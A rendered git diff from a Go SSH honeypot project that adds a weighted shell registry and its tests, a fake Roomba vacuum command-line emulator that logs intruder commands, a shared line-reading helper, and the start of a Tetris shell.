// Select picks a shell using weighted random selection.
|
||||||
|
func (r *Registry) Select() (Shell, error) {
|
||||||
|
r.mu.RLock()
|
||||||
|
defer r.mu.RUnlock()
|
||||||
|
|
||||||
|
if len(r.entries) == 0 {
|
||||||
|
return nil, errors.New("no shells registered")
|
||||||
|
}
|
||||||
|
|
||||||
|
total := 0
|
||||||
|
for _, e := range r.entries {
|
||||||
|
total += e.weight
|
||||||
|
}
|
||||||
|
|
||||||
|
pick := rand.IntN(total)
|
||||||
|
cumulative := 0
|
||||||
|
for _, e := range r.entries {
|
||||||
|
cumulative += e.weight
|
||||||
|
if pick < cumulative {
|
||||||
|
return e.shell, nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should never reach here, but return last entry as fallback.
|
||||||
|
return r.entries[len(r.entries)-1].shell, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// Get returns a shell by name.
|
||||||
|
func (r *Registry) Get(name string) (Shell, bool) {
|
||||||
|
r.mu.RLock()
|
||||||
|
defer r.mu.RUnlock()
|
||||||
|
|
||||||
|
for _, e := range r.entries {
|
||||||
|
if e.shell.Name() == name {
|
||||||
|
return e.shell, true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return nil, false
|
||||||
|
}
|
||||||
107
internal/shell/registry_test.go
Normal file
107
internal/shell/registry_test.go
Normal file
@@ -0,0 +1,107 @@
|
|||||||
|
package shell
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"io"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
// stubShell implements Shell for testing.
|
||||||
|
type stubShell struct {
|
||||||
|
name string
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *stubShell) Name() string { return s.name }
|
||||||
|
func (s *stubShell) Description() string { return "stub" }
|
||||||
|
func (s *stubShell) Handle(_ context.Context, _ *SessionContext, _ io.ReadWriteCloser) error {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistryRegisterAndGet(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
sh := &stubShell{name: "test"}
|
||||||
|
|
||||||
|
if err := r.Register(sh, 1); err != nil {
|
||||||
|
t.Fatalf("Register: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
got, ok := r.Get("test")
|
||||||
|
if !ok {
|
||||||
|
t.Fatal("Get returned false")
|
||||||
|
}
|
||||||
|
if got.Name() != "test" {
|
||||||
|
t.Errorf("Name = %q, want %q", got.Name(), "test")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistryGetMissing(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
_, ok := r.Get("nope")
|
||||||
|
if ok {
|
||||||
|
t.Fatal("Get returned true for missing shell")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistryDuplicateName(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
r.Register(&stubShell{name: "dup"}, 1)
|
||||||
|
err := r.Register(&stubShell{name: "dup"}, 1)
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error for duplicate name")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistryInvalidWeight(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
err := r.Register(&stubShell{name: "a"}, 0)
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error for weight 0")
|
||||||
|
}
|
||||||
|
err = r.Register(&stubShell{name: "b"}, -1)
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error for negative weight")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistrySelectEmpty(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
_, err := r.Select()
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error from empty registry")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistrySelectSingle(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
r.Register(&stubShell{name: "only"}, 1)
|
||||||
|
|
||||||
|
for range 10 {
|
||||||
|
sh, err := r.Select()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Select: %v", err)
|
||||||
|
}
|
||||||
|
if sh.Name() != "only" {
|
||||||
|
t.Errorf("Name = %q, want %q", sh.Name(), "only")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistrySelectWeighted(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
r.Register(&stubShell{name: "heavy"}, 100)
|
||||||
|
r.Register(&stubShell{name: "light"}, 1)
|
||||||
|
|
||||||
|
counts := map[string]int{}
|
||||||
|
for range 1000 {
|
||||||
|
sh, err := r.Select()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Select: %v", err)
|
||||||
|
}
|
||||||
|
counts[sh.Name()]++
|
||||||
|
}
|
||||||
|
|
||||||
|
// "heavy" has weight 100 vs "light" weight 1, so heavy should get ~99%.
|
||||||
|
if counts["heavy"] < 900 {
|
||||||
|
t.Errorf("heavy selected %d/1000 times, expected >900", counts["heavy"])
|
||||||
|
}
|
||||||
|
}
|
||||||
463
internal/shell/roomba/roomba.go
Normal file
463
internal/shell/roomba/roomba.go
Normal file
@@ -0,0 +1,463 @@
|
|||||||
|
package roomba
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"slices"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
)
|
||||||
|
|
||||||
|
const sessionTimeout = 5 * time.Minute
|
||||||
|
|
||||||
|
// RoombaShell emulates an iRobot Roomba vacuum robot interface.
|
||||||
|
type RoombaShell struct{}
|
||||||
|
|
||||||
|
// NewRoombaShell returns a new RoombaShell instance.
|
||||||
|
func NewRoombaShell() *RoombaShell {
|
||||||
|
return &RoombaShell{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (r *RoombaShell) Name() string { return "roomba" }
|
||||||
|
func (r *RoombaShell) Description() string { return "iRobot Roomba shell emulator" }
|
||||||
|
|
||||||
|
func (r *RoombaShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
|
||||||
|
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
state := newRoombaState()
|
||||||
|
|
||||||
|
banner := strings.ReplaceAll(bootBanner(), "\n", "\r\n")
|
||||||
|
fmt.Fprint(rw, banner)
|
||||||
|
|
||||||
|
for {
|
||||||
|
if _, err := fmt.Fprint(rw, "RoombaOS> "); err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
line, err := shell.ReadLine(ctx, rw)
|
||||||
|
if errors.Is(err, io.EOF) {
|
||||||
|
fmt.Fprint(rw, "logout\r\n")
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
trimmed := strings.TrimSpace(line)
|
||||||
|
if trimmed == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
result := state.dispatch(trimmed)
|
||||||
|
|
||||||
|
var output string
|
||||||
|
if result.output != "" {
|
||||||
|
output = result.output
|
||||||
|
output = strings.ReplaceAll(output, "\r\n", "\n")
|
||||||
|
output = strings.ReplaceAll(output, "\n", "\r\n")
|
||||||
|
fmt.Fprintf(rw, "%s\r\n", output)
|
||||||
|
}
|
||||||
|
|
||||||
|
if sess.Store != nil {
|
||||||
|
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output); err != nil {
|
||||||
|
return fmt.Errorf("append session log: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if sess.OnCommand != nil {
|
||||||
|
sess.OnCommand("roomba")
|
||||||
|
}
|
||||||
|
|
||||||
|
if result.exit {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func bootBanner() string {
|
||||||
|
return `
|
||||||
|
____ _ ___ ____
|
||||||
|
| _ \ ___ ___ _ __ ___ | |__ __ _ / _ \/ ___|
|
||||||
|
| |_) / _ \ / _ \| '_ ` + "`" + ` _ \| '_ \ / _` + "`" + ` | | | \___ \
|
||||||
|
| _ < (_) | (_) | | | | | | |_) | (_| | |_| |___) |
|
||||||
|
|_| \_\___/ \___/|_| |_| |_|_.__/ \__,_|\___/|____/
|
||||||
|
|
||||||
|
iRobot Roomba j7+ | RoombaOS v4.3.7
|
||||||
|
Serial: RMB-7291-J7P-0482 | Firmware: 4.3.7-stable
|
||||||
|
Battery: 73% | WiFi: Connected (SmartHome-5G)
|
||||||
|
|
||||||
|
Type 'help' for available commands.
|
||||||
|
|
||||||
|
`
|
||||||
|
}
|
||||||
|
|
||||||
|
type room struct {
|
||||||
|
name string
|
||||||
|
areaSqFt int
|
||||||
|
lastCleaned time.Time
|
||||||
|
}
|
||||||
|
|
||||||
|
type scheduleEntry struct {
|
||||||
|
day string
|
||||||
|
time string
|
||||||
|
}
|
||||||
|
|
||||||
|
type historyEntry struct {
|
||||||
|
timestamp time.Time
|
||||||
|
room string
|
||||||
|
duration string
|
||||||
|
note string
|
||||||
|
}
|
||||||
|
|
||||||
|
type roombaState struct {
|
||||||
|
battery int
|
||||||
|
dustbin int
|
||||||
|
status string
|
||||||
|
rooms []room
|
||||||
|
schedule []scheduleEntry
|
||||||
|
cleanHistory []historyEntry
|
||||||
|
}
|
||||||
|
|
||||||
|
type commandResult struct {
|
||||||
|
output string
|
||||||
|
exit bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func newRoombaState() *roombaState {
|
||||||
|
now := time.Now()
|
||||||
|
return &roombaState{
|
||||||
|
battery: 73,
|
||||||
|
dustbin: 61,
|
||||||
|
status: "Docked",
|
||||||
|
rooms: []room{
|
||||||
|
{"Kitchen", 180, now.Add(-2 * time.Hour)},
|
||||||
|
{"Living Room", 320, now.Add(-5 * time.Hour)},
|
||||||
|
{"Bedroom", 200, now.Add(-26 * time.Hour)},
|
||||||
|
{"Hallway", 60, now.Add(-5 * time.Hour)},
|
||||||
|
{"Bathroom", 75, now.Add(-50 * time.Hour)},
|
||||||
|
{"Cat's Room", 110, now.Add(-3 * time.Hour)},
|
||||||
|
},
|
||||||
|
schedule: []scheduleEntry{
|
||||||
|
{"Monday", "09:00"},
|
||||||
|
{"Wednesday", "09:00"},
|
||||||
|
{"Friday", "09:00"},
|
||||||
|
{"Saturday", "14:00"},
|
||||||
|
},
|
||||||
|
cleanHistory: []historyEntry{
|
||||||
|
{now.Add(-2 * time.Hour), "Kitchen", "23 min", "Completed normally"},
|
||||||
|
{now.Add(-3 * time.Hour), "Cat's Room", "18 min", "Cat detected - rerouting"},
|
||||||
|
{now.Add(-5 * time.Hour), "Living Room", "34 min", "Encountered sock near couch"},
|
||||||
|
{now.Add(-5*time.Hour - 40*time.Minute), "Hallway", "8 min", "Completed normally"},
|
||||||
|
{now.Add(-26 * time.Hour), "Bedroom", "27 min", "Tangled in phone charger"},
|
||||||
|
{now.Add(-50 * time.Hour), "Bathroom", "14 min", "Unidentified sticky substance detected"},
|
||||||
|
},
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) dispatch(input string) commandResult {
|
||||||
|
parts := strings.Fields(input)
|
||||||
|
if len(parts) == 0 {
|
||||||
|
return commandResult{}
|
||||||
|
}
|
||||||
|
|
||||||
|
cmd := strings.ToLower(parts[0])
|
||||||
|
args := parts[1:]
|
||||||
|
|
||||||
|
switch cmd {
|
||||||
|
case "help":
|
||||||
|
return s.cmdHelp()
|
||||||
|
case "status":
|
||||||
|
return s.cmdStatus()
|
||||||
|
case "clean":
|
||||||
|
return s.cmdClean(args)
|
||||||
|
case "dock":
|
||||||
|
return s.cmdDock()
|
||||||
|
case "map":
|
||||||
|
return s.cmdMap()
|
||||||
|
case "schedule":
|
||||||
|
return s.cmdSchedule(args)
|
||||||
|
case "history":
|
||||||
|
return s.cmdHistory()
|
||||||
|
case "diagnostics":
|
||||||
|
return s.cmdDiagnostics()
|
||||||
|
case "alerts":
|
||||||
|
return s.cmdAlerts()
|
||||||
|
case "reboot":
|
||||||
|
return s.cmdReboot()
|
||||||
|
case "exit", "logout":
|
||||||
|
return commandResult{output: "Disconnecting from RoombaOS. Happy cleaning!", exit: true}
|
||||||
|
default:
|
||||||
|
return commandResult{output: fmt.Sprintf("RoombaOS: unknown command '%s'. Type 'help' for available commands.", cmd)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) cmdHelp() commandResult {
|
||||||
|
help := `Available commands:
|
||||||
|
help - Show this help message
|
||||||
|
status - Show robot status
|
||||||
|
clean - Start full cleaning job
|
||||||
|
clean room <name> - Clean a specific room
|
||||||
|
dock - Return to dock
|
||||||
|
map - Show floor plan and room list
|
||||||
|
schedule - List cleaning schedule
|
||||||
|
schedule add <day> <time> - Add scheduled cleaning
|
||||||
|
schedule remove <day> - Remove scheduled cleaning
|
||||||
|
history - Show recent cleaning history
|
||||||
|
diagnostics - Run system diagnostics
|
||||||
|
alerts - Show active alerts
|
||||||
|
reboot - Reboot RoombaOS
|
||||||
|
exit / logout - Disconnect`
|
||||||
|
return commandResult{output: help}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) cmdStatus() commandResult {
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString("=== RoombaOS System Status ===\n")
|
||||||
|
b.WriteString("Model: iRobot Roomba j7+\n")
|
||||||
|
b.WriteString(fmt.Sprintf("Status: %s\n", s.status))
|
||||||
|
b.WriteString(fmt.Sprintf("Battery: %d%%\n", s.battery))
|
||||||
|
b.WriteString(fmt.Sprintf("Dustbin: %d%% full\n", s.dustbin))
|
||||||
|
b.WriteString("Side brush: OK (142 hrs)\n")
|
||||||
|
b.WriteString("Main brush: OK (98 hrs)\n")
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString("WiFi: Connected (SmartHome-5G)\n")
|
||||||
|
b.WriteString("Signal: -38 dBm\n")
|
||||||
|
b.WriteString("Alexa: Linked\n")
|
||||||
|
b.WriteString("Google Home: Linked\n")
|
||||||
|
b.WriteString("iRobot Home App: Connected\n")
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString("Firmware: v4.3.7-stable\n")
|
||||||
|
b.WriteString("LIDAR: Operational\n")
|
||||||
|
b.WriteString("Clean Area Total: 12,847 sq ft (lifetime)")
|
||||||
|
return commandResult{output: b.String()}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) cmdClean(args []string) commandResult {
|
||||||
|
if s.status == "Cleaning" {
|
||||||
|
return commandResult{output: "Already cleaning. Use 'dock' to cancel and return to dock."}
|
||||||
|
}
|
||||||
|
|
||||||
|
if len(args) >= 2 && strings.ToLower(args[0]) == "room" {
|
||||||
|
roomName := strings.Join(args[1:], " ")
|
||||||
|
for _, r := range s.rooms {
|
||||||
|
if strings.EqualFold(r.name, roomName) {
|
||||||
|
s.status = "Cleaning"
|
||||||
|
return commandResult{output: fmt.Sprintf(
|
||||||
|
"Starting targeted clean: %s (%d sq ft)\nEstimated time: %d minutes\nUndocking... navigating to %s...",
|
||||||
|
r.name, r.areaSqFt, r.areaSqFt/8, r.name,
|
||||||
|
)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return commandResult{output: fmt.Sprintf("Room '%s' not found. Use 'map' to see available rooms.", roomName)}
|
||||||
|
}
|
||||||
|
|
||||||
|
if len(args) > 0 {
|
||||||
|
return commandResult{output: "Usage: clean [room <name>]"}
|
||||||
|
}
|
||||||
|
|
||||||
|
s.status = "Cleaning"
|
||||||
|
var totalArea int
|
||||||
|
for _, r := range s.rooms {
|
||||||
|
totalArea += r.areaSqFt
|
||||||
|
}
|
||||||
|
return commandResult{output: fmt.Sprintf(
|
||||||
|
"Starting full house clean\nTotal area: %d sq ft across %d rooms\nEstimated time: %d minutes\nUndocking... beginning clean cycle...",
|
||||||
|
totalArea, len(s.rooms), totalArea/8,
|
||||||
|
)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) cmdDock() commandResult {
|
||||||
|
if s.status == "Docked" {
|
||||||
|
return commandResult{output: "Already docked."}
|
||||||
|
}
|
||||||
|
if s.status == "Returning to dock" {
|
||||||
|
return commandResult{output: "Already returning to dock."}
|
||||||
|
}
|
||||||
|
s.status = "Returning to dock"
|
||||||
|
return commandResult{output: "Cancelling current job. Returning to dock...\nEstimated arrival: 2 minutes"}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) cmdMap() commandResult {
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString("=== Floor Plan ===\n\n")
|
||||||
|
b.WriteString(" +------------+----------+\n")
|
||||||
|
b.WriteString(" | | |\n")
|
||||||
|
b.WriteString(" | Kitchen | Bathroom |\n")
|
||||||
|
b.WriteString(" | 180sqft | 75sqft |\n")
|
||||||
|
b.WriteString(" | | |\n")
|
||||||
|
b.WriteString(" +------+-----+----+-----+\n")
|
||||||
|
b.WriteString(" | | | |\n")
|
||||||
|
b.WriteString(" | Hall | Living | Cat |\n")
|
||||||
|
b.WriteString(" | 60sf | Room | Rm |\n")
|
||||||
|
b.WriteString(" | | 320sqft |110sf|\n")
|
||||||
|
b.WriteString(" +------+ +-----+\n")
|
||||||
|
b.WriteString(" | | |\n")
|
||||||
|
b.WriteString(" | Bed +----------+\n")
|
||||||
|
b.WriteString(" | room | [DOCK]\n")
|
||||||
|
b.WriteString(" |200sf |\n")
|
||||||
|
b.WriteString(" +------+\n")
|
||||||
|
b.WriteString("\nRoom Details:\n")
|
||||||
|
b.WriteString(fmt.Sprintf(" %-15s %-10s %s\n", "ROOM", "AREA", "LAST CLEANED"))
|
||||||
|
b.WriteString(fmt.Sprintf(" %-15s %-10s %s\n", "----", "----", "------------"))
|
||||||
|
for _, r := range s.rooms {
|
||||||
|
ago := time.Since(r.lastCleaned).Truncate(time.Minute)
|
||||||
|
b.WriteString(fmt.Sprintf(" %-15s %-10s %s ago\n", r.name, fmt.Sprintf("%d sqft", r.areaSqFt), formatDuration(ago)))
|
||||||
|
}
|
||||||
|
return commandResult{output: b.String()}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) cmdSchedule(args []string) commandResult {
|
||||||
|
if len(args) == 0 {
|
||||||
|
return s.scheduleList()
|
||||||
|
}
|
||||||
|
|
||||||
|
sub := strings.ToLower(args[0])
|
||||||
|
switch sub {
|
||||||
|
case "add":
|
||||||
|
if len(args) < 3 {
|
||||||
|
return commandResult{output: "Usage: schedule add <day> <time>\nExample: schedule add Tuesday 10:00"}
|
||||||
|
}
|
||||||
|
return s.scheduleAdd(args[1], args[2])
|
||||||
|
case "remove":
|
||||||
|
if len(args) < 2 {
|
||||||
|
return commandResult{output: "Usage: schedule remove <day>"}
|
||||||
|
}
|
||||||
|
return s.scheduleRemove(args[1])
|
||||||
|
default:
|
||||||
|
return commandResult{output: fmt.Sprintf("Unknown schedule subcommand '%s'. Try: add, remove", sub)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) scheduleList() commandResult {
|
||||||
|
if len(s.schedule) == 0 {
|
||||||
|
return commandResult{output: "No cleaning schedule configured."}
|
||||||
|
}
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString("=== Cleaning Schedule ===\n")
|
||||||
|
b.WriteString(fmt.Sprintf(" %-12s %s\n", "DAY", "TIME"))
|
||||||
|
b.WriteString(fmt.Sprintf(" %-12s %s\n", "---", "----"))
|
||||||
|
for _, e := range s.schedule {
|
||||||
|
b.WriteString(fmt.Sprintf(" %-12s %s\n", e.day, e.time))
|
||||||
|
}
|
||||||
|
b.WriteString(fmt.Sprintf("\n%d scheduled cleaning(s)", len(s.schedule)))
|
||||||
|
return commandResult{output: b.String()}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) scheduleAdd(day, t string) commandResult {
|
||||||
|
day = capitalizeFirst(strings.ToLower(day))
|
||||||
|
validDays := []string{"Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"}
|
||||||
|
if !slices.Contains(validDays, day) {
|
||||||
|
return commandResult{output: fmt.Sprintf("Invalid day '%s'. Use a day of the week (e.g. Monday, Tuesday).", day)}
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, e := range s.schedule {
|
||||||
|
if strings.EqualFold(e.day, day) {
|
||||||
|
return commandResult{output: fmt.Sprintf("Schedule for %s already exists. Remove it first.", day)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
s.schedule = append(s.schedule, scheduleEntry{day: day, time: t})
|
||||||
|
return commandResult{output: fmt.Sprintf("Scheduled cleaning added: %s at %s", day, t)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) scheduleRemove(day string) commandResult {
|
||||||
|
day = capitalizeFirst(strings.ToLower(day))
|
||||||
|
for i, e := range s.schedule {
|
||||||
|
if strings.EqualFold(e.day, day) {
|
||||||
|
s.schedule = append(s.schedule[:i], s.schedule[i+1:]...)
|
||||||
|
return commandResult{output: fmt.Sprintf("Removed schedule for %s.", day)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return commandResult{output: fmt.Sprintf("No schedule found for '%s'.", day)}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) cmdHistory() commandResult {
|
||||||
|
if len(s.cleanHistory) == 0 {
|
||||||
|
return commandResult{output: "No cleaning history."}
|
||||||
|
}
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString("=== Cleaning History ===\n")
|
||||||
|
b.WriteString(fmt.Sprintf(" %-20s %-15s %-10s %s\n", "TIME", "ROOM", "DURATION", "NOTE"))
|
||||||
|
b.WriteString(fmt.Sprintf(" %-20s %-15s %-10s %s\n", "----", "----", "--------", "----"))
|
||||||
|
for _, h := range s.cleanHistory {
|
||||||
|
ts := h.timestamp.Format("2006-01-02 15:04")
|
||||||
|
b.WriteString(fmt.Sprintf(" %-20s %-15s %-10s %s\n", ts, h.room, h.duration, h.note))
|
||||||
|
}
|
||||||
|
b.WriteString(fmt.Sprintf("\n%d session(s) recorded", len(s.cleanHistory)))
|
||||||
|
return commandResult{output: b.String()}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) cmdDiagnostics() commandResult {
|
||||||
|
diag := `Running RoombaOS diagnostics...
|
||||||
|
|
||||||
|
[1/8] Cliff sensors........... OK
|
||||||
|
[2/8] Bumper sensor........... OK
|
||||||
|
[3/8] Side brush motor........ OK (142 hrs until replacement)
|
||||||
|
[4/8] Main brush motor........ OK (98 hrs until replacement)
|
||||||
|
[5/8] Wheel motors............ OK (L: 1204 hrs, R: 1204 hrs)
|
||||||
|
[6/8] LIDAR module............ OK (last calibrated 3 days ago)
|
||||||
|
[7/8] Dustbin sensor.......... OK
|
||||||
|
[8/8] WiFi module............. OK (signal: -38 dBm)
|
||||||
|
|
||||||
|
ALL SYSTEMS NOMINAL`
|
||||||
|
return commandResult{output: diag}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) cmdAlerts() commandResult {
|
||||||
|
var alerts []string
|
||||||
|
if s.dustbin >= 60 {
|
||||||
|
alerts = append(alerts, fmt.Sprintf("WARNING: Dustbin %d%% full - consider emptying", s.dustbin))
|
||||||
|
}
|
||||||
|
alerts = append(alerts,
|
||||||
|
"WARNING: Side brush replacement due in 12 hours",
|
||||||
|
"INFO: Unidentified sticky substance detected in Kitchen",
|
||||||
|
"INFO: Cat frequently blocking cleaning path in Cat's Room",
|
||||||
|
"INFO: Firmware update available: v4.4.0-beta",
|
||||||
|
"INFO: Filter replacement recommended in 14 days",
|
||||||
|
)
|
||||||
|
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString("=== Active Alerts ===\n")
|
||||||
|
for _, a := range alerts {
|
||||||
|
b.WriteString(a + "\n")
|
||||||
|
}
|
||||||
|
b.WriteString(fmt.Sprintf("\n%d alert(s) active", len(alerts)))
|
||||||
|
return commandResult{output: b.String()}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *roombaState) cmdReboot() commandResult {
|
||||||
|
reboot := `RoombaOS is rebooting...
|
||||||
|
|
||||||
|
Stopping navigation engine..... done
|
||||||
|
Saving room map data........... done
|
||||||
|
Flushing cleaning logs......... done
|
||||||
|
Disconnecting from WiFi........ done
|
||||||
|
|
||||||
|
Rebooting now. Goodbye!`
|
||||||
|
return commandResult{output: reboot, exit: true}
|
||||||
|
}
|
||||||
|
|
||||||
|
func capitalizeFirst(s string) string {
|
||||||
|
if s == "" {
|
||||||
|
return s
|
||||||
|
}
|
||||||
|
return strings.ToUpper(s[:1]) + s[1:]
|
||||||
|
}
|
||||||
|
|
||||||
|
func formatDuration(d time.Duration) string {
|
||||||
|
hours := int(d.Hours())
|
||||||
|
minutes := int(d.Minutes()) % 60
|
||||||
|
if hours >= 24 {
|
||||||
|
days := hours / 24
|
||||||
|
hours %= 24
|
||||||
|
return fmt.Sprintf("%dd %dh", days, hours)
|
||||||
|
}
|
||||||
|
if hours > 0 {
|
||||||
|
return fmt.Sprintf("%dh %dm", hours, minutes)
|
||||||
|
}
|
||||||
|
return fmt.Sprintf("%dm", minutes)
|
||||||
|
}
|
||||||
91
internal/shell/shell.go
Normal file
91
internal/shell/shell.go
Normal file
@@ -0,0 +1,91 @@
|
|||||||
|
package shell
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Shell is the interface that all honeypot shell implementations must satisfy.
|
||||||
|
type Shell interface {
|
||||||
|
Name() string
|
||||||
|
Description() string
|
||||||
|
Handle(ctx context.Context, sess *SessionContext, rw io.ReadWriteCloser) error
|
||||||
|
}
|
||||||
|
|
||||||
|
// SessionContext carries metadata about the current SSH session.
|
||||||
|
type SessionContext struct {
|
||||||
|
SessionID string
|
||||||
|
Username string
|
||||||
|
RemoteAddr string
|
||||||
|
ClientVersion string
|
||||||
|
Store storage.Store
|
||||||
|
ShellConfig map[string]any
|
||||||
|
CommonConfig ShellCommonConfig
|
||||||
|
OnCommand func(shell string) // called when a command is executed; may be nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// ShellCommonConfig holds settings shared across all shell types.
|
||||||
|
type ShellCommonConfig struct {
|
||||||
|
Hostname string
|
||||||
|
Banner string
|
||||||
|
FakeUser string // override username in prompt; empty = use authenticated user
|
||||||
|
}
|
||||||
|
|
||||||
|
// ReadLine reads a line of input byte-by-byte, handling backspace, Ctrl+C, and Ctrl+D.
|
||||||
|
func ReadLine(ctx context.Context, rw io.ReadWriter) (string, error) {
|
||||||
|
var buf []byte
|
||||||
|
b := make([]byte, 1)
|
||||||
|
|
||||||
|
for {
|
||||||
|
select {
|
||||||
|
case <-ctx.Done():
|
||||||
|
return "", ctx.Err()
|
||||||
|
default:
|
||||||
|
}
|
||||||
|
|
||||||
|
n, err := rw.Read(b)
|
||||||
|
if err != nil {
|
||||||
|
return "", err
|
||||||
|
}
|
||||||
|
if n == 0 {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
ch := b[0]
|
||||||
|
switch {
|
||||||
|
case ch == '\r' || ch == '\n':
|
||||||
|
fmt.Fprint(rw, "\r\n")
|
||||||
|
return string(buf), nil
|
||||||
|
|
||||||
|
case ch == 4: // Ctrl+D
|
||||||
|
if len(buf) == 0 {
|
||||||
|
return "", io.EOF
|
||||||
|
}
|
||||||
|
|
||||||
|
case ch == 3: // Ctrl+C
|
||||||
|
fmt.Fprint(rw, "^C\r\n")
|
||||||
|
return "", nil
|
||||||
|
|
||||||
|
case ch == 127 || ch == 8: // DEL or Backspace
|
||||||
|
if len(buf) > 0 {
|
||||||
|
buf = buf[:len(buf)-1]
|
||||||
|
fmt.Fprint(rw, "\b \b")
|
||||||
|
}
|
||||||
|
|
||||||
|
case ch == 27: // ESC - start of escape sequence
|
||||||
|
// Read and discard the rest of the escape sequence.
|
||||||
|
// Most are 3 bytes: ESC [ X (arrow keys, etc.)
|
||||||
|
next := make([]byte, 1)
|
||||||
|
if n, _ := rw.Read(next); n > 0 && next[0] == '[' {
|
||||||
|
rw.Read(next) // read the final byte
|
||||||
|
}
|
||||||
|
|
||||||
|
case ch >= 32 && ch < 127: // printable ASCII
|
||||||
|
buf = append(buf, ch)
|
||||||
|
rw.Write([]byte{ch})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
101
internal/shell/tetris/data.go
Normal file
101
internal/shell/tetris/data.go
Normal file
@@ -0,0 +1,101 @@
|
|||||||
|
package tetris
|
||||||
|
|
||||||
|
import "github.com/charmbracelet/lipgloss"
|
||||||
|
|
||||||
|
// pieceType identifies a tetromino (0–6).
|
||||||
|
type pieceType int
|
||||||
|
|
||||||
|
const (
|
||||||
|
pieceI pieceType = iota
|
||||||
|
pieceO
|
||||||
|
pieceT
|
||||||
|
pieceS
|
||||||
|
pieceZ
|
||||||
|
pieceJ
|
||||||
|
pieceL
|
||||||
|
)
|
||||||
|
|
||||||
|
const numPieceTypes = 7
|
||||||
|
|
||||||
|
// Standard Tetris colors.
|
||||||
|
var pieceColors = [numPieceTypes]lipgloss.Color{
|
||||||
|
lipgloss.Color("#00FFFF"), // I — cyan
|
||||||
